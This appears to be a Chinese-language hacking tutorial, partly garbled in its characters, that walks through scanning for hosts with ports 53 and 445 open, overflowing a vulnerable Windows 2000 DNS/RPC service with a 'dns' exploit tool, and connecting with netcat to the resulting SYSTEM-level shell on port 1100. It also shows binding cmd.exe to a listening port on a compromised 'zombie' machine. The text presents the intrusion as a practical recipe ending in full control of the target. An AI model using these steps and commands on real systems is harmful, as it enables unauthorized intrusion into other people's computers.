前提是必須要開放53、445端口 1、選擇superscan進行掃描，在端口列表中勾選上53、445端口，然后選擇主機段進行掃描。
2、選擇存在53、445端口的主機，在cmd下輸入dns -t ip對主機進行特定漏洞端口掃描，“1028 ：Vulnerability”表示
1028端口存在溢出漏洞，“os:window 2000”表示系統(tǒng)類型為window 2000。
3、在執(zhí)行dns -t 2000all ip 1028 對目標主機進行溢出。connection to target host tcp port established 成功連接到主機的tcp端口上，
successfully bound to the vulnerale dcerpc interface 已經(jīng)連接到對方的rpc端口上，os fingerprint result:windows 2000
系統(tǒng)指紋鑒定對方是wind2000系統(tǒng)，attack sent,check port 1100 攻擊代碼已經(jīng)成功發(fā)送，并嘗試連接1100端口。當出現(xiàn)最后這一句
提示語句的時候就意味著我們要成功了。
4、怎么連接對方的1100端口呢，當然我們要使用nc了。
5、nc全稱叫"netcat"，這是一個非常簡單易用的基于tcp/ip協(xié)議（c/s模型的）的“瑞士軍刀”。下面介紹一下它的幾個常用功能
1、nc.exe -vv -l -p 6069，表示在本地6069端口上進行監(jiān)聽。-vv：顯示詳細的信息。-l:進行監(jiān)聽，監(jiān)聽入站信息。-p：監(jiān)聽所使用的
端口號。
2、正如我們遇到的情況，對方已經(jīng)開放了一個端口。他在等待我們連接哦，連接上去會有什么呢？當然是system權限的shell了。
nc.exe -vv 127.0.0.1 5257，連接ip為127.0.0.1的5257端口。
3、還可以在本地監(jiān)聽端口的同時綁定shell，就相當于一個telnet服務端。通常這個命令在肉雞上執(zhí)行，然后當我們連接上去就可以獲得
這個shell了。nc.exe -l -p 5257 -t -e cmd.exe，在本機5257端口上監(jiān)聽并綁定cmd.exe。-e 作用就是程序定向。-t以telnet的形式
來應答。
4、它可以用來手動對主機提交數(shù)據(jù)包（通常為80）端口，nc.exe -vv 127.0.0.1 80 <yan.txt，往ip為127.0.0.1的80端口提交yan.txt中
的內(nèi)容。
6、介紹完nc.exe的四種常用方式，現(xiàn)在知道如何使用nc來鏈接對方的1100端口了吧，我們使用nc -vv 127.0.0.1 1100 連接對方的1100端口，
成功獲得了一個具有system權限的cmdshell，現(xiàn)在想干什么就干什么了。